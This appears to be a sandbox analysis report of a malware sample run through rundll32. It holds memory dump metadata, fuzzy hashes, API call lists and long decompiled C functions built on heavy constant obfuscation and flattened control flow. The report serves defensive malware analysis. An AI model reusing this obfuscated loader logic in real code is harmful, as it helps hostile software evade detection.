                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Gb$L-R$ThFT$iR6$H^
                                                                                                                      • API String ID: 0-1567385930
                                                                                                                      • Opcode ID: 530a903c014da879c72b207405b5d78bc36da64ddf1a64a5b02b4b5b0fc68630
                                                                                                                      • Instruction ID: ecf6408dd70ecb5f1927dd7496d006af5c3d080eec0791fc5cab5b610c65fd5a
                                                                                                                      • Opcode Fuzzy Hash: 530a903c014da879c72b207405b5d78bc36da64ddf1a64a5b02b4b5b0fc68630
                                                                                                                      • Instruction Fuzzy Hash: E6513371C05219EBDF58DFA4E94A8EEFBB2FF04314F208159D412BA260C3B51A56CF94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                      • GetKeyState.USER32(00000010), ref: 1001B463
                                                                                                                      • GetKeyState.USER32(00000011), ref: 1001B46C
                                                                                                                      • GetKeyState.USER32(00000012), ref: 1001B475
                                                                                                                      • SendMessageA.USER32 ref: 1001B48B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: State$LongMessageSendWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1063413437-0
                                                                                                                      • Opcode ID: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                      • Instruction ID: b089c7fc05c7e6fbdd4fc06f52c570ea12a8721339fdd196cb0bdf3cbec2e35a
                                                                                                                      • Opcode Fuzzy Hash: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                      • Instruction Fuzzy Hash: F6F0E97679075A27EB20BA744CC1F9A0154DF89BD9F028534B741EE0D3DBB0C8819170
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 76%
                                                                                                                      			E006920BA() {
                                                                                                                      				char _v520;
                                                                                                                      				signed int _v524;
                                                                                                                      				unsigned int _v528;
                                                                                                                      				signed int _v532;
                                                                                                                      				signed int _v536;
                                                                                                                      				signed int _v540;
                                                                                                                      				signed int _v544;
                                                                                                                      				signed int _v548;
                                                                                                                      				signed int _v552;
                                                                                                                      				signed int _v556;
                                                                                                                      				signed int _v560;
                                                                                                                      				signed int _v564;
                                                                                                                      				signed int _v568;
                                                                                                                      				signed int _v572;
                                                                                                                      				signed int _v576;
                                                                                                                      				signed int _v580;
                                                                                                                      				signed int _v584;
                                                                                                                      				signed int _v588;
                                                                                                                      				signed int _v592;
                                                                                                                      				signed int _v596;
                                                                                                                      				signed int _v600;
                                                                                                                      				signed int _v604;
                                                                                                                      				signed int _v608;
                                                                                                                      				signed int _v612;
                                                                                                                      				signed int _v616;
                                                                                                                      				signed int _v620;
                                                                                                                      				signed int _v624;
                                                                                                                      				signed int _t227;
                                                                                                                      				intOrPtr _t228;
                                                                                                                      				signed int _t230;
                                                                                                                      				void* _t231;
                                                                                                                      				intOrPtr _t235;
                                                                                                                      				intOrPtr _t245;
                                                                                                                      				void* _t247;
                                                                                                                      				intOrPtr _t254;
                                                                                                                      				signed int _t272;
                                                                                                                      				signed int _t273;
                                                                                                                      				signed int _t274;
                                                                                                                      				signed int _t275;
                                                                                                                      				void* _t277;
                                                                                                                      				signed int* _t279;
                                                                                                                      				void* _t283;
                                                                                                                      
                                                                                                                      				_t279 =  &_v624;
                                                                                                                      				_v612 = 0x15bebb;
                                                                                                                      				_v612 = _v612 ^ 0x0c09d82a;
                                                                                                                      				_t247 = 0x7e01d7;
                                                                                                                      				_v612 = _v612 + 0xffff69e9;
                                                                                                                      				_v612 = _v612 ^ 0xcffb1e8d;
                                                                                                                      				_v612 = _v612 ^ 0xc3e0ceeb;
                                                                                                                      				_v596 = 0xb5bc7f;
                                                                                                                      				_v596 = _v596 << 0xa;
                                                                                                                      				_v596 = _v596 + 0xbaa7;
                                                                                                                      				_v596 = _v596 ^ 0xd6f2b68e;
                                                                                                                      				_v600 = 0x5909af;
                                                                                                                      				_v600 = _v600 ^ 0x0096463d;
                                                                                                                      				_v600 = _v600 >> 3;
                                                                                                                      				_v600 = _v600 ^ 0x0016e9cd;
                                                                                                                      				_v548 = 0x801d18;
                                                                                                                      				_v548 = _v548 + 0xffffc800;
                                                                                                                      				_v548 = _v548 ^ 0x0070ca5a;
                                                                                                                      				_v580 = 0x2361dd;
                                                                                                                      				_v580 = _v580 * 0x6f;
                                                                                                                      				_t277 = 0;
                                                                                                                      				_v580 = _v580 << 0xe;
                                                                                                                      				_v580 = _v580 ^ 0xdbb34e1e;
                                                                                                                      				_v528 = 0x864281;
                                                                                                                      				_v528 = _v528 >> 0xc;
                                                                                                                      				_v528 = _v528 ^ 0x0000b217;
                                                                                                                      				_v560 = 0x478502;
                                                                                                                      				_v560 = _v560 | 0x3d47d1eb;
                                                                                                                      				_v560 = _v560 ^ 0x3d4c1a49;
                                                                                                                      				_v540 = 0x8f961f;
                                                                                                                      				_v540 = _v540 >> 0xc;
                                                                                                                      				_v540 = _v540 ^ 0x000d133d;
                                                                                                                      				_v572 = 0xef4b2;
                                                                                                                      				_v572 = _v572 << 0xd;
                                                                                                                      				_v572 = _v572 + 0xffff85b1;
                                                                                                                      				_v572 = _v572 ^ 0xde949f86;
                                                                                                                      				_v608 = 0x8e969a;
                                                                                                                      				_v608 = _v608 << 0xd;
                                                                                                                      				_t272 = 0x21;
                                                                                                                      				_v608 = _v608 / _t272;
                                                                                                                      				_t273 = 0x2f;
                                                                                                                      				_v608 = _v608 / _t273;
                                                                                                                      				_v608 = _v608 ^ 0x002a10b8;
                                                                                                                      				_v620 = 0x864bbd;
                                                                                                                      				_v620 = _v620 << 0x10;
                                                                                                                      				_v620 = _v620 + 0x87ba;
                                                                                                                      				_v620 = _v620 + 0x936f;
                                                                                                                      				_v620 = _v620 ^ 0x4bb78bcc;
                                                                                                                      				_v564 = 0xfb8a17;
                                                                                                                      				_t274 = 0x62;
                                                                                                                      				_v564 = _v564 * 0x63;
                                                                                                                      				_v564 = _v564 ^ 0x61429d97;
                                                                                                                      				_v576 = 0x222f;
                                                                                                                      				_v576 = _v576 >> 4;
                                                                                                                      				_v576 = _v576 ^ 0xf39884cf;
                                                                                                                      				_v576 = _v576 ^ 0xf39d4647;
                                                                                                                      				_v556 = 0x6068cb;
                                                                                                                      				_v556 = _v556 ^ 0xfe1a734d;
                                                                                                                      				_v556 = _v556 ^ 0xfe79d9b4;
                                                                                                                      				_v616 = 0xc46e23;
                                                                                                                      				_v616 = _v616 >> 2;
                                                                                                                      				_v616 = _v616 / _t274;
                                                                                                                      				_v616 = _v616 * 0x76;
                                                                                                                      				_v616 = _v616 ^ 0x003e2a5a;
                                                                                                                      				_v624 = 0x4617e4;
                                                                                                                      				_v624 = _v624 + 0xffff4d74;
                                                                                                                      				_v624 = _v624 ^ 0x9dcdfd87;
                                                                                                                      				_v624 = _v624 + 0x3fd8;
                                                                                                                      				_v624 = _v624 ^ 0x9d89a5c2;
                                                                                                                      				_v588 = 0x3a0167;
                                                                                                                      				_v588 = _v588 << 1;
                                                                                                                      				_v588 = _v588 + 0xffff1a51;
                                                                                                                      				_v588 = _v588 ^ 0x00728a40;
                                                                                                                      				_v532 = 0x3a363e;
                                                                                                                      				_v532 = _v532 ^ 0xe52a74a2;
                                                                                                                      				_v532 = _v532 ^ 0xe514694b;
                                                                                                                      				_v544 = 0x52d5cb;
                                                                                                                      				_v544 = _v544 | 0x185d0a08;
                                                                                                                      				_v544 = _v544 ^ 0x18524fe5;
                                                                                                                      				_v584 = 0x37b3aa;
                                                                                                                      				_v584 = _v584 + 0xebef;
                                                                                                                      				_t275 = 0x72;
                                                                                                                      				_v584 = _v584 * 0x28;
                                                                                                                      				_v584 = _v584 ^ 0x08d0b087;
                                                                                                                      				_v592 = 0xa4bebe;
                                                                                                                      				_v592 = _v592 >> 8;
                                                                                                                      				_v592 = _v592 | 0x739fbd45;
                                                                                                                      				_v592 = _v592 ^ 0x739593e3;
                                                                                                                      				_v552 = 0x17b1c;
                                                                                                                      				_v552 = _v552 << 0xe;
                                                                                                                      				_v552 = _v552 ^ 0x5ecd7403;
                                                                                                                      				_v568 = 0x403d75;
                                                                                                                      				_v568 = _v568 >> 3;
                                                                                                                      				_v568 = _v568 | 0x80b15bc0;
                                                                                                                      				_v568 = _v568 ^ 0x80b9a416;
                                                                                                                      				_v536 = 0x2ed64e;
                                                                                                                      				_t276 = _v524;
                                                                                                                      				_v536 = _v536 / _t275;
                                                                                                                      				_v536 = _v536 ^ 0x00033d67;
                                                                                                                      				_v604 = 0x8b403d;
                                                                                                                      				_v604 = _v604 + 0xffff3866;
                                                                                                                      				_v604 = _v604 << 8;
                                                                                                                      				_v604 = _v604 ^ 0x8a7a6cd3;
                                                                                                                      				goto L1;
                                                                                                                      				do {
                                                                                                                      					while(1) {
                                                                                                                      						L1:
                                                                                                                      						_t283 = _t247 - 0x73dad95;
                                                                                                                      						if(_t283 > 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						if(_t283 == 0) {
                                                                                                                      							E0069DA22(_v544, _v584, __eflags, _v592,  &_v520, _t247, _v552);
                                                                                                                      							_t235 = E00682051(_v536,  &_v520, _v604);
                                                                                                                      							_t254 =  *0x6a3e10; // 0x0
                                                                                                                      							 *((intOrPtr*)(_t254 + 0x10)) = _t235;
                                                                                                                      						} else {
                                                                                                                      							if(_t247 == 0x7e01d7) {
                                                                                                                      								_push(_t247);
                                                                                                                      								_push(_t247);
                                                                                                                      								 *0x6a3e10 = E00687FF2(0x45c);
                                                                                                                      								_t247 = 0x8643fcd;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t247 == 0xd34913) {
                                                                                                                      									_t247 = 0x148c4fa;
                                                                                                                      									_v524 = _v596;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t247 == 0xfeb697) {
                                                                                                                      										_v524 = _v612;
                                                                                                                      										goto L8;
                                                                                                                      									} else {
                                                                                                                      										if(_t247 != 0x148c4fa) {
                                                                                                                      											goto L20;
                                                                                                                      										} else {
                                                                                                                      											E00698F9E(_v620, _v564, _v576, _v556, _t276);
                                                                                                                      											_t279 =  &(_t279[3]);
                                                                                                                      											L8:
                                                                                                                      											_t247 = 0xac90332;
                                                                                                                      											continue;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						L23:
                                                                                                                      						return _t277;
                                                                                                                      					}
                                                                                                                      					__eflags = _t247 - 0x8643fcd;
                                                                                                                      					if(_t247 == 0x8643fcd) {
                                                                                                                      						_t227 = E0068912C(_v600, _v560, _t247, _v540, _t247, _v572, _v608);
                                                                                                                      						_t276 = _t227;
                                                                                                                      						_t279 =  &(_t279[5]);
                                                                                                                      						__eflags = _t227;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							_t247 = 0xfeb697;
                                                                                                                      							goto L20;
                                                                                                                      						} else {
                                                                                                                      							_t245 =  *0x6a3e10; // 0x0
                                                                                                                      							 *((intOrPtr*)(_t245 + 0x450)) = 1;
                                                                                                                      							_t247 = 0xd34913;
                                                                                                                      							goto L1;
                                                                                                                      						}
                                                                                                                      					} else {
                                                                                                                      						__eflags = _t247 - 0xac90332;
                                                                                                                      						if(_t247 == 0xac90332) {
                                                                                                                      							_push(_v532);
                                                                                                                      							_push(_v524);
                                                                                                                      							_push(_v588);
                                                                                                                      							_t228 =  *0x6a3e10; // 0x0
                                                                                                                      							_push(_t228 + 0x23c);
                                                                                                                      							_t230 = E006946BB(_v616, _v624);
                                                                                                                      							_t279 = _t279 - 0xc + 0x1c;
                                                                                                                      							_t247 = 0xe2d9513;
                                                                                                                      							__eflags = _t230;
                                                                                                                      							_t231 = 1;
                                                                                                                      							_t277 =  ==  ? _t231 : _t277;
                                                                                                                      							goto L1;
                                                                                                                      						} else {
                                                                                                                      							__eflags = _t247 - 0xe2d9513;
                                                                                                                      							if(_t247 != 0xe2d9513) {
                                                                                                                      								goto L20;
                                                                                                                      							} else {
                                                                                                                      								E0068A55F();
                                                                                                                      								_t247 = 0x73dad95;
                                                                                                                      								goto L1;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					goto L23;
                                                                                                                      					L20:
                                                                                                                      					__eflags = _t247 - 0x13a2d4a;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L23;
                                                                                                                      			}













































                                                                                                                      0x0069220e
                                                                                                                      0x00692216
                                                                                                                      0x0069221e
                                                                                                                      0x0069222b
                                                                                                                      0x0069222c
                                                                                                                      0x00692230
                                                                                                                      0x00692238
                                                                                                                      0x00692240
                                                                                                                      0x00692245
                                                                                                                      0x0069224d
                                                                                                                      0x00692255
                                                                                                                      0x0069225d
                                                                                                                      0x00692265
                                                                                                                      0x0069226d
                                                                                                                      0x00692275
                                                                                                                      0x00692280
                                                                                                                      0x00692289
                                                                                                                      0x0069228d
                                                                                                                      0x00692297
                                                                                                                      0x006922a4
                                                                                                                      0x006922b1
                                                                                                                      0x006922b9
                                                                                                                      0x006922c1
                                                                                                                      0x006922c9
                                                                                                                      0x006922d1
                                                                                                                      0x006922d5
                                                                                                                      0x006922dd
                                                                                                                      0x006922e5
                                                                                                                      0x006922ed
                                                                                                                      0x006922f5
                                                                                                                      0x006922fd
                                                                                                                      0x00692305
                                                                                                                      0x0069230d
                                                                                                                      0x00692315
                                                                                                                      0x0069231d
                                                                                                                      0x0069232c
                                                                                                                      0x0069232d
                                                                                                                      0x00692331
                                                                                                                      0x00692339
                                                                                                                      0x00692341
                                                                                                                      0x00692346
                                                                                                                      0x0069234e
                                                                                                                      0x00692356
                                                                                                                      0x0069235e
                                                                                                                      0x00692363
                                                                                                                      0x0069236b
                                                                                                                      0x00692373
                                                                                                                      0x00692378
                                                                                                                      0x00692380
                                                                                                                      0x00692388
                                                                                                                      0x00692396
                                                                                                                      0x0069239a
                                                                                                                      0x0069239e
                                                                                                                      0x006923a6
                                                                                                                      0x006923ae
                                                                                                                      0x006923b6
                                                                                                                      0x006923bb
                                                                                                                      0x006923bb
                                                                                                                      0x006923c3
                                                                                                                      0x006923c3
                                                                                                                      0x006923c3
                                                                                                                      0x006923c3
                                                                                                                      0x006923c5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x006923cb
                                                                                                                      0x00692519
                                                                                                                      0x00692532
                                                                                                                      0x00692537
                                                                                                                      0x00692540
                                                                                                                      0x006923d1
                                                                                                                      0x006923d7
                                                                                                                      0x0069243c
                                                                                                                      0x0069243d
                                                                                                                      0x00692445
                                                                                                                      0x0069244a
                                                                                                                      0x00000000
                                                                                                                      0x006923d9
                                                                                                                      0x006923df
                                                                                                                      0x00692420
                                                                                                                      0x00692425
                                                                                                                      0x00000000
                                                                                                                      0x006923e1
                                                                                                                      0x006923e7
                                                                                                                      0x00692416
                                                                                                                      0x00000000
                                                                                                                      0x006923e9
                                                                                                                      0x006923ef
                                                                                                                      0x00000000
                                                                                                                      0x006923f5
                                                                                                                      0x00692406
                                                                                                                      0x0069240b
                                                                                                                      0x0069240e
                                                                                                                      0x0069240e
                                                                                                                      0x00000000
                                                                                                                      0x0069240e
                                                                                                                      0x006923ef
                                                                                                                      0x006923e7
                                                                                                                      0x006923df
                                                                                                                      0x006923d7
                                                                                                                      0x00692544
                                                                                                                      0x0069254f
                                                                                                                      0x0069254f
                                                                                                                      0x00692454
                                                                                                                      0x0069245a
                                                                                                                      0x006924ca
                                                                                                                      0x006924cf
                                                                                                                      0x006924d1
                                                                                                                      0x006924d4
                                                                                                                      0x006924d6
                                                                                                                      0x006924f0
                                                                                                                      0x00000000
                                                                                                                      0x006924d8
                                                                                                                      0x006924d8
                                                                                                                      0x006924e0
                                                                                                                      0x006924e6
                                                                                                                      0x00000000
                                                                                                                      0x006924e6
                                                                                                                      0x0069245c
                                                                                                                      0x0069245c
                                                                                                                      0x0069245e
                                                                                                                      0x00692478
                                                                                                                      0x0069247c
                                                                                                                      0x00692480
                                                                                                                      0x00692484
                                                                                                                      0x00692499
                                                                                                                      0x0069249a
                                                                                                                      0x0069249f
                                                                                                                      0x006924a2
                                                                                                                      0x006924a7
                                                                                                                      0x006924ab
                                                                                                                      0x006924ac
                                                                                                                      0x00000000
                                                                                                                      0x00692460
                                                                                                                      0x00692460
                                                                                                                      0x00692466
                                                                                                                      0x00000000
                                                                                                                      0x0069246c
                                                                                                                      0x0069246c
                                                                                                                      0x00692471
                                                                                                                      0x00000000
                                                                                                                      0x00692471
                                                                                                                      0x00692466
                                                                                                                      0x0069245e
                                                                                                                      0x00000000
                                                                                                                      0x006924f5
                                                                                                                      0x006924f5
                                                                                                                      0x006924f5
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: /"$>6:$Z*>$u=@
                                                                                                                      • API String ID: 0-89199335
                                                                                                                      • Opcode ID: abd72c4b7881ebedb01ff99783ff842820e80987bc29643770483e7829a650ab
                                                                                                                      • Instruction ID: 1baa8cb4c2e55b3b8ccf48b75849ee696763cd8ab396ecdda56ec65025c5cda6
                                                                                                                      • Opcode Fuzzy Hash: abd72c4b7881ebedb01ff99783ff842820e80987bc29643770483e7829a650ab
                                                                                                                      • Instruction Fuzzy Hash: C9B111711083819FC758CF65C49A81BFBE6FBD4748F209A1DF6A286261D3B5C949CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E00685548(void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                      				char _v16;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				char _v28;
                                                                                                                      				char _v40;
                                                                                                                      				intOrPtr _v44;
                                                                                                                      				intOrPtr _v48;
                                                                                                                      				intOrPtr _v52;
                                                                                                                      				intOrPtr _v56;
                                                                                                                      				char _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				char _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				signed int _v104;
                                                                                                                      				signed int _v108;
                                                                                                                      				signed int _v112;
                                                                                                                      				unsigned int _v116;
                                                                                                                      				signed int _v120;
                                                                                                                      				signed int _v124;
                                                                                                                      				signed int _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				signed int _v136;
                                                                                                                      				signed int _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				void* __ecx;
                                                                                                                      				void* _t190;
                                                                                                                      				void* _t206;
                                                                                                                      				void* _t208;
                                                                                                                      				signed int _t209;
                                                                                                                      				char* _t211;
                                                                                                                      				signed int _t212;
                                                                                                                      				intOrPtr _t222;
                                                                                                                      				intOrPtr* _t225;
                                                                                                                      				void* _t227;
                                                                                                                      				char* _t229;
                                                                                                                      				char _t233;
                                                                                                                      				intOrPtr _t255;
                                                                                                                      				intOrPtr* _t257;
                                                                                                                      				signed int _t258;
                                                                                                                      				signed int _t259;
                                                                                                                      				signed int _t260;
                                                                                                                      				signed int* _t263;
                                                                                                                      
                                                                                                                      				_t225 = _a16;
                                                                                                                      				_t257 = _a4;
                                                                                                                      				_push(_t225);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_t257);
                                                                                                                      				_push(__edx);
                                                                                                                      				E006920B9(_t190);
                                                                                                                      				_v56 = 0xb9e7cb;
                                                                                                                      				_t255 = 0;
                                                                                                                      				_v52 = 0x6e87b5;
                                                                                                                      				_t263 =  &(( &_v148)[6]);
                                                                                                                      				_v48 = 0;
                                                                                                                      				_v44 = 0;
                                                                                                                      				_t227 = 0x3ccc1e9;
                                                                                                                      				_v128 = 0x85629b;
                                                                                                                      				_t258 = 0x62;
                                                                                                                      				_v128 = _v128 * 0x5a;
                                                                                                                      				_v128 = _v128 + 0xfbaf;
                                                                                                                      				_v128 = _v128 ^ 0x2ee5a62d;
                                                                                                                      				_v144 = 0xfc0c7f;
                                                                                                                      				_v144 = _v144 ^ 0xfdfaf442;
                                                                                                                      				_v144 = _v144 >> 1;
                                                                                                                      				_v144 = _v144 | 0x14143ad1;
                                                                                                                      				_v144 = _v144 ^ 0x7e977ecf;
                                                                                                                      				_v96 = 0xd1f565;
                                                                                                                      				_v96 = _v96 * 0x21;
                                                                                                                      				_v96 = _v96 ^ 0x1b12de47;
                                                                                                                      				_v104 = 0xb219e8;
                                                                                                                      				_v104 = _v104 | 0x75a31cc8;
                                                                                                                      				_v104 = _v104 ^ 0x75be6df4;
                                                                                                                      				_v80 = 0x6fb9b6;
                                                                                                                      				_v80 = _v80 * 0x3e;
                                                                                                                      				_v80 = _v80 ^ 0x1b001c4a;
                                                                                                                      				_v132 = 0x1154a0;
                                                                                                                      				_v132 = _v132 << 0xb;
                                                                                                                      				_v132 = _v132 + 0xfffffde8;
                                                                                                                      				_v132 = _v132 | 0xd1d436bb;
                                                                                                                      				_v132 = _v132 ^ 0xdbfeae5a;
                                                                                                                      				_v76 = 0x5374cd;
                                                                                                                      				_v76 = _v76 << 2;
                                                                                                                      				_v76 = _v76 ^ 0x0147cb67;
                                                                                                                      				_v140 = 0x35e68a;
                                                                                                                      				_v140 = _v140 + 0xffff467d;
                                                                                                                      				_v140 = _v140 * 0x7c;
                                                                                                                      				_v140 = _v140 ^ 0x566bba39;
                                                                                                                      				_v140 = _v140 ^ 0x4faa8078;
                                                                                                                      				_v124 = 0xf91357;
                                                                                                                      				_v124 = _v124 << 0xf;
                                                                                                                      				_v124 = _v124 + 0xf2e4;
                                                                                                                      				_v124 = _v124 ^ 0x89afe8a4;
                                                                                                                      				_v112 = 0xf055e4;
                                                                                                                      				_v112 = _v112 ^ 0x101963ca;
                                                                                                                      				_v112 = _v112 | 0x7be8ad21;
                                                                                                                      				_v112 = _v112 ^ 0x7be17431;
                                                                                                                      				_v84 = 0x17393b;
                                                                                                                      				_v84 = _v84 << 6;
                                                                                                                      				_v84 = _v84 ^ 0x05c81c43;
                                                                                                                      				_v120 = 0xf688ab;
                                                                                                                      				_v120 = _v120 / _t258;
                                                                                                                      				_v120 = _v120 * 0x2d;
                                                                                                                      				_v120 = _v120 ^ 0x00718a36;
                                                                                                                      				_v116 = 0xa21f51;
                                                                                                                      				_v116 = _v116 + 0x3c3b;
                                                                                                                      				_v116 = _v116 >> 0xa;
                                                                                                                      				_v116 = _v116 ^ 0x0006c391;
                                                                                                                      				_v88 = 0x51e239;
                                                                                                                      				_v88 = _v88 + 0x2ec0;
                                                                                                                      				_v88 = _v88 ^ 0x0058dd2b;
                                                                                                                      				_v136 = 0xa92d92;
                                                                                                                      				_v136 = _v136 >> 0xd;
                                                                                                                      				_v136 = _v136 ^ 0x0647b396;
                                                                                                                      				_v136 = _v136 ^ 0x20b7ff2f;
                                                                                                                      				_v136 = _v136 ^ 0x26fd7475;
                                                                                                                      				_v108 = 0xb50576;
                                                                                                                      				_t259 = 0x45;
                                                                                                                      				_v108 = _v108 / _t259;
                                                                                                                      				_v108 = _v108 ^ 0xb94dc178;
                                                                                                                      				_v108 = _v108 ^ 0xb943792d;
                                                                                                                      				_v148 = 0xb9b260;
                                                                                                                      				_t260 = 0x14;
                                                                                                                      				_v148 = _v148 / _t260;
                                                                                                                      				_v148 = _v148 * 0x3f;
                                                                                                                      				_v148 = _v148 >> 2;
                                                                                                                      				_v148 = _v148 ^ 0x009e914b;
                                                                                                                      				_v92 = 0x6e7d65;
                                                                                                                      				_v92 = _v92 | 0xb573042f;
                                                                                                                      				_v92 = _v92 ^ 0xb570b7bc;
                                                                                                                      				_v100 = 0xfd8f7e;
                                                                                                                      				_v100 = _v100 * 0x5d;
                                                                                                                      				_v100 = _v100 ^ 0x5c1db3f3;
                                                                                                                      				L1:
                                                                                                                      				while(_t227 != 0x3c16ad4) {
                                                                                                                      					if(_t227 == 0x3ccc1e9) {
                                                                                                                      						_t227 = 0x7dbf5b4;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t227 == 0x79abc1a) {
                                                                                                                      						_t229 =  &_v28;
                                                                                                                      						_t208 = E0068AEFB(_t229, _v124, _v112, _v84,  &_v16, _v120);
                                                                                                                      						_t263 =  &(_t263[4]);
                                                                                                                      						if(_t208 != 0) {
                                                                                                                      							_push(_t229);
                                                                                                                      							_push(_t229);
                                                                                                                      							_t222 = E00687FF2(_v24);
                                                                                                                      							 *_t257 = _t222;
                                                                                                                      							if(_t222 != 0) {
                                                                                                                      								E0068ED7E(_v108,  *_t257, _v148, _v28, _v24);
                                                                                                                      								_t263 =  &(_t263[3]);
                                                                                                                      								 *((intOrPtr*)(_t257 + 4)) = _v24;
                                                                                                                      								_t255 = 1;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						_t227 = 0xdaef9d5;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t227 == 0x7dbf5b4) {
                                                                                                                      						_t209 =  *((intOrPtr*)(_t225 + 4));
                                                                                                                      						_t233 =  *_t225;
                                                                                                                      						_v68 = _t209;
                                                                                                                      						_v72 = _t233;
                                                                                                                      						_t211 = _t209 - 1 + _t233;
                                                                                                                      						while(_t211 > _t233) {
                                                                                                                      							if( *_t211 == 0) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							_t211 = _t211 - 1;
                                                                                                                      						}
                                                                                                                      						_t212 = _t211 - _t233;
                                                                                                                      						_v68 = _t212;
                                                                                                                      						if(_t212 == 0) {
                                                                                                                      							L16:
                                                                                                                      							_t227 = 0xfc35b14;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						while(_v68 % _v144 != _v128) {
                                                                                                                      							_t163 =  &_v68;
                                                                                                                      							 *_t163 = _v68 - 1;
                                                                                                                      							if( *_t163 != 0) {
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							goto L16;
                                                                                                                      						}
                                                                                                                      						goto L16;
                                                                                                                      					}
                                                                                                                      					if(_t227 == 0xdaef9d5) {
                                                                                                                      						E00698519(_v92, _v100, _v64);
                                                                                                                      						L28:
                                                                                                                      						return _t255;
                                                                                                                      					}
                                                                                                                      					if(_t227 != 0xfc35b14) {
                                                                                                                      						L25:
                                                                                                                      						if(_t227 != 0xb843ed5) {
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						goto L28;
                                                                                                                      					}
                                                                                                                      					if(E00685E60( &_v72, _v96, _v104,  &_v64) == 0) {
                                                                                                                      						goto L28;
                                                                                                                      					}
                                                                                                                      					_t227 = 0x3c16ad4;
                                                                                                                      				}
                                                                                                                      				_t206 = E00688B3D( &_v40, _v80, _v132,  &_v64, _v76, _v140);
                                                                                                                      				_t263 =  &(_t263[4]);
                                                                                                                      				if(_t206 == 0) {
                                                                                                                      					_t227 = 0xdaef9d5;
                                                                                                                      					goto L25;
                                                                                                                      				}
                                                                                                                      				_t227 = 0x79abc1a;
                                                                                                                      				goto L1;
                                                                                                                      			}
                                                                                                                      0x006857a4
                                                                                                                      0x006857ad
                                                                                                                      0x006857b1
                                                                                                                      0x006857b6
                                                                                                                      0x006857be
                                                                                                                      0x006857c6
                                                                                                                      0x006857ce
                                                                                                                      0x006857d6
                                                                                                                      0x006857e3
                                                                                                                      0x006857e7
                                                                                                                      0x00000000
                                                                                                                      0x006857ef
                                                                                                                      0x00685801
                                                                                                                      0x0068591d
                                                                                                                      0x00000000
                                                                                                                      0x0068591d
                                                                                                                      0x0068580d
